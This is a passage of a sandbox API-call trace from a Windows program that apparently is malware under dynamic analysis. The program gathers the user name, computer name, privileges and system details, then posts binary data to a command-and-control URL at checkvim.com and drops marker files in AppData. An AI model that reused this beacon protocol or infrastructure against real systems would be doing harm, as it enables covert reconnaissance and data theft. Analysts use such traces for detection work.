dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.880] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x1ef0000 [0185.880] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861098 | out: hHeap=0x840000) returned 1 [0185.882] RtlGetVersion (in: lpVersionInformation=0x873a58 | out: lpVersionInformation=0x873a58*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0185.882] GetProcessHeap () returned 0x840000 [0185.882] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19f7c0 | out: lpSystemTimeAsFileTime=0x19f7c0*(dwLowDateTime=0x59e7dab0, dwHighDateTime=0x1d7b429)) [0185.883] GetProcessHeap () returned 0x840000 [0185.883] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7) returned 0x871be8 [0185.883] GetProcessHeap () returned 0x840000 [0185.883] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1a5) returned 0x873a58 [0185.883] GetProcessHeap () returned 0x840000 [0185.883] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xa0000) returned 0x1fa2020 [0185.899] GetProcessHeap () returned 0x840000 [0185.899] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x1fa2020 | out: hHeap=0x840000) returned 1 [0185.964] GetProcessHeap () returned 0x840000 [0185.964] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873c08 [0185.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.966] GetUserNameW (in: lpBuffer=0x873c08, pcbBuffer=0x19f81c | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19f81c) returned 1 [0185.969] GetProcessHeap () returned 0x840000 [0185.969] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873c08 | out: hHeap=0x840000) returned 1 [0185.969] GetProcessHeap () returned 0x840000 [0185.969] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873c08 [0185.969] GetComputerNameW (in: lpBuffer=0x873c08, nSize=0x19f81c | out: lpBuffer="XC64ZB", nSize=0x19f81c) returned 1 [0185.969] GetProcessHeap () returned 0x840000 [0185.970] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873c08 | out: hHeap=0x840000) returned 1 [0185.970] GetCurrentThread () returned 0xfffffffe [0185.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.972] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19f81c | out: TokenHandle=0x19f81c*=0x0) returned 0 [0185.972] GetLastError () returned 0x3f0 [0185.973] GetCurrentProcess () returned 0xffffffff [0185.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.974] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19f81c | out: TokenHandle=0x19f81c*=0x22c) returned 1 [0185.974] GetProcessHeap () returned 0x840000 [0185.974] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873c08 [0185.974] GetProcessHeap () returned 0x840000 [0185.974] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x8758a8 [0185.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.986] GetTokenInformation (in: TokenHandle=0x22c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19f818 | out: TokenInformation=0x0, ReturnLength=0x19f818) returned 0 [0185.986] GetProcessHeap () returned 0x840000 [0185.986] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8706c8 [0185.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.988] GetTokenInformation (in: TokenHandle=0x22c, TokenInformationClass=0x1, TokenInformation=0x8706c8, TokenInformationLength=0x24, ReturnLength=0x19f818 | out: TokenInformation=0x8706c8, ReturnLength=0x19f818) returned 1 [0185.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.989] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x8706d0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x873c08, cchName=0x19f808, ReferencedDomainName=0x8758a8, cchReferencedDomainName=0x19f80c, peUse=0x19f804 | out: Name="RDhJ0CNFevzX", cchName=0x19f808, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19f80c, peUse=0x19f804) returned 1 [0185.992] GetProcessHeap () returned 0x840000 [0185.992] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f44) returned 0x87a228 [0185.993] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.994] wvsprintfW (in: param_1=0x87a228, param_2="%s", arglist=0x19f7f4 | out: param_1="XC64ZB") returned 6 [0185.994] GetProcessHeap () returned 0x840000 [0185.994] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x872118 [0185.994] GetProcessHeap () returned 0x840000 [0185.994] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.994] GetProcessHeap () returned 0x840000 [0185.994] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8706c8 | out: hHeap=0x840000) returned 1 [0185.994] CloseHandle (hObject=0x22c) returned 1 [0185.995] GetProcessHeap () returned 0x840000 [0185.995] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8758a8 | out: hHeap=0x840000) returned 1 [0185.995] GetProcessHeap () returned 0x840000 [0185.995] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873c08 | out: hHeap=0x840000) returned 1 [0185.995] GetProcessHeap () returned 0x840000 [0185.995] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872118 | out: hHeap=0x840000) returned 1 [0185.996] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.996] GetDesktopWindow () returned 0x10010 [0185.997] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.998] GetWindowRect (in: hWnd=0x10010, lpRect=0x19f810 | out: lpRect=0x19f810) returned 1 [0186.000] GetProcessHeap () returned 0x840000 [0186.000] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x8) returned 0x871c28 [0186.001] GetProcessHeap () returned 0x840000 [0186.001] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c28 | out: hHeap=0x840000) returned 1 [0186.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0186.002] GetUserNameW (in: lpBuffer=0x19f610, pcbBuffer=0x19f818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19f818) returned 1 [0186.004] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x769b0000 [0186.010] GetProcAddress (hModule=0x769b0000, lpProcName="NetUserGetInfo") returned 0x658b33a0 [0186.164] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19f81c | out: bufptr=0x865e70*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0x124bb5, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0186.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0186.381] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19f808, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19f810 | out: pSid=0x19f810*=0x8721c0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0186.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0186.382] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x8721c0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19f814 | out: IsMember=0x19f814) returned 1 [0186.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0186.396] GetNativeSystemInfo (in: lpSystemInfo=0x19f7ec | out: lpSystemInfo=0x19f7ec*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5507)) [0186.397] GetProcessHeap () returned 0x840000 [0186.397] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x865fd8 [0186.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0186.398] CryptAcquireContextW (in: phProv=0x19f5c8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f5c8*=0x0) returned 0 [0186.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0186.422] CryptAcquireContextW (in: phProv=0x19f5c8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f5c8*=0x871d98) returned 1 [0186.438] GetProcessHeap () returned 0x840000 [0186.438] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8706c8 [0186.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0186.439] CryptImportKey (in: hProv=0x871d98, pbData=0x8706c8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f5cc | out: phKey=0x19f5cc*=0x866bf0) returned 1 [0186.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0186.441] CryptSetKeyParam (hKey=0x866bf0, dwParam=0x4, pbData=0x19f5c4*=0x1, dwFlags=0x0) returned 1 [0186.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0186.442] CryptSetKeyParam (hKey=0x866bf0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.443] GetProcessHeap () returned 0x840000 [0186.443] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8706c8 | out: hHeap=0x840000) returned 1 [0186.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0186.444] CryptDecrypt (in: hKey=0x866bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x865fd8, pdwDataLen=0x19f61c | out: pbData=0x865fd8, pdwDataLen=0x19f61c) returned 1 [0186.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0186.450] CryptDestroyKey (hKey=0x866bf0) returned 1 [0186.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0186.451] CryptReleaseContext (hProv=0x871d98, dwFlags=0x0) returned 1 [0186.451] GetProcessHeap () returned 0x840000 [0186.452] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x875e38 [0186.452] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0186.453] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0186.454] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0186.454] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0186.455] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0186.455] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0186.455] GetProcessHeap () returned 0x840000 [0186.455] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0186.455] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f5d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f5f8 | out: ppResult=0x19f5f8*=0x8715d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878bf0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0186.752] GetProcessHeap () returned 0x840000 [0186.752] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0186.752] socket (af=2, type=1, protocol=6) returned 0x280 [0186.754] connect (s=0x280, name=0x878bf0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0186.828] FreeAddrInfoW (pAddrInfo=0x8715d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878bf0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0186.828] GetProcessHeap () returned 0x840000 [0186.828] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x87ea48 [0186.828] GetProcessHeap () returned 0x840000 [0186.828] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0186.829] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0186.830] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f600 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0186.830] GetProcessHeap () returned 0x840000 [0186.830] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87ec50 [0186.830] GetProcessHeap () returned 0x840000 [0186.830] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0186.830] GetProcessHeap () returned 0x840000 [0186.830] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fdd0 [0186.830] GetProcessHeap () returned 0x840000 [0186.831] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0186.831] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0186.832] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f600 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 288\r\nConnection: close\r\n\r\n") returned 237 [0186.832] GetProcessHeap () returned 0x840000 [0186.832] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x87ed08 [0186.832] GetProcessHeap () returned 0x840000 [0186.832] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0186.832] send (s=0x280, buf=0x87ed08*, len=237, flags=0) returned 237 [0186.833] send (s=0x280, buf=0x8765b0*, len=288, flags=0) returned 288 [0186.833] GetProcessHeap () returned 0x840000 [0186.833] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8805c8 [0186.833] recv (in: s=0x280, buf=0x8805c8, len=4048, flags=0 | out: buf=0x8805c8*) returned 229 [0187.320] GetProcessHeap () returned 0x840000 [0187.320] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87ed08 | out: hHeap=0x840000) returned 1 [0187.321] GetProcessHeap () returned 0x840000 [0187.321] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0187.321] GetProcessHeap () returned 0x840000 [0187.321] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87ec50 | out: hHeap=0x840000) returned 1 [0187.321] GetProcessHeap () returned 0x840000 [0187.321] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87ea48 | out: hHeap=0x840000) returned 1 [0187.321] closesocket (s=0x280) returned 0 [0187.322] GetProcessHeap () returned 0x840000 [0187.322] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0187.322] GetProcessHeap () returned 0x840000 [0187.322] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875e38 | out: hHeap=0x840000) returned 1 [0187.322] GetProcessHeap () returned 0x840000 [0187.322] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x865fd8 | out: hHeap=0x840000) returned 1 [0187.322] GetProcessHeap () returned 0x840000 [0187.322] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0187.322] GetProcessHeap () returned 0x840000 [0187.322] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875e38 [0187.323] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0187.323] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x875e38 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0187.323] GetProcessHeap () returned 0x840000 [0187.324] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x8815a0 [0187.325] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0187.325] wvsprintfW (in: param_1=0x8815a0, param_2="%s\\%s", arglist=0x19f630 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0187.325] GetProcessHeap () returned 0x840000 [0187.325] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5c) returned 0x87ea48 [0187.326] GetProcessHeap () returned 0x840000 [0187.326] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8815a0 | out: hHeap=0x840000) returned 1 [0187.332] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0187.332] GetProcessHeap () returned 0x840000 [0187.333] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f50) returned 0x8815a0 [0187.334] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0187.334] wvsprintfW (in: param_1=0x8815a0, param_2="%s\\%s.%s", arglist=0x19f644 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb") returned 55 [0187.335] GetProcessHeap () returned 0x840000 [0187.335] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x72) returned 0x861118 [0187.335] GetProcessHeap () returned 0x840000 [0187.335] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8815a0 | out: hHeap=0x840000) returned 1 [0187.335] GetProcessHeap () returned 0x840000 [0187.335] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87ea48 | out: hHeap=0x840000) returned 1 [0187.335] GetProcessHeap () returned 0x840000 [0187.335] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875e38 | out: hHeap=0x840000) returned 1 [0187.336] VirtualQuery (in: lpAddress=0x1ef0000, lpBuffer=0x19f7dc, dwLength=0x1c | out: lpBuffer=0x19f7dc*(BaseAddress=0x1ef0000, AllocationBase=0x1ef0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.338] VirtualQuery (in: lpAddress=0x1ef0000, lpBuffer=0x19f7bc, dwLength=0x1c | out: lpBuffer=0x19f7bc*(BaseAddress=0x1ef0000, AllocationBase=0x1ef0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.340] VirtualAlloc (lpAddress=0x0, dwSize=0x1004, flAllocationType=0x3000, flProtect=0x4) returned 0x1f00000 [0187.342] VirtualFree (lpAddress=0x1ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.342] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb")) returned 0 [0187.343] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0187.344] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.346] WriteFile (in: hFile=0x280, lpBuffer=0x1f00000*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x19f7e4, lpOverlapped=0x0 | out: lpBuffer=0x1f00000*, lpNumberOfBytesWritten=0x19f7e4*=0x4, lpOverlapped=0x0) returned 1 [0187.347] CloseHandle (hObject=0x280) returned 1 [0187.348] GetProcessHeap () returned 0x840000 [0187.348] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861118 | out: hHeap=0x840000) returned 1 [0187.348] GetProcessHeap () returned 0x840000 [0187.348] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0187.348] GetProcessHeap () returned 0x840000 [0187.348] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0187.349] GetProcessHeap () returned 0x840000 [0187.349] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 [0187.349] GetProcessHeap () returned 0x840000 [0187.349] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872130 | out: hHeap=0x840000) returned 1 [0187.349] GetProcessHeap () returned 0x840000 [0187.349] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871be8 | out: hHeap=0x840000) returned 1 [0187.349] GetProcessHeap () returned 0x840000 [0187.349] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f220 | out: hHeap=0x840000) returned 1 [0187.349] GetProcessHeap () returned 0x840000 [0187.349] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8657b0 | out: hHeap=0x840000) returned 1 [0187.349] GetProcessHeap () returned 0x840000 [0187.349] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1388) returned 0x86f220 [0187.349] GetProcessHeap () returned 0x840000 [0187.349] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x878b48 [0187.349] GetProcessHeap () returned 0x840000 [0187.349] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875e38 [0187.350] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0187.351] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x875e38 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0187.351] GetProcessHeap () returned 0x840000 [0187.351] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x8805c8 [0187.351] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0187.366] wvsprintfW (in: param_1=0x8805c8, param_2="%s\\%s", arglist=0x19f688 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0187.366] GetProcessHeap () returned 0x840000 [0187.367] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5c) returned 0x87ea48 [0187.367] GetProcessHeap () returned 0x840000 [0187.367] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0187.367] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0187.367] GetProcessHeap () returned 0x840000 [0187.367] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f50) returned 0x8805c8 [0187.368] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0187.369] wvsprintfW (in: param_1=0x8805c8, param_2="%s\\%s.%s", arglist=0x19f69c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck") returned 55 [0187.369] GetProcessHeap () returned 0x840000 [0187.369] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x72) returned 0x861518 [0187.369] GetProcessHeap () returned 0x840000 [0187.369] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0187.369] GetProcessHeap () returned 0x840000 [0187.369] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87ea48 | out: hHeap=0x840000) returned 1 [0187.370] GetProcessHeap () returned 0x840000 [0187.370] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875e38 | out: hHeap=0x840000) returned 1 [0187.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0187.372] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck") returned 0 [0187.372] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0187.374] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.375] WriteFile (in: hFile=0x280, lpBuffer=0x19f864*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19f828, lpOverlapped=0x0 | out: lpBuffer=0x19f864*, lpNumberOfBytesWritten=0x19f828*=0x1, lpOverlapped=0x0) returned 1 [0187.377] CloseHandle (hObject=0x280) returned 1 [0187.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.382] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19f844, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19f84c | out: pSid=0x19f84c*=0x878bd8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0187.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.383] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x878bd8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19f850 | out: IsMember=0x19f850) returned 1 [0187.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.385] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.lck")) returned 1 [0187.387] GetProcessHeap () returned 0x840000 [0187.387] HeapFree 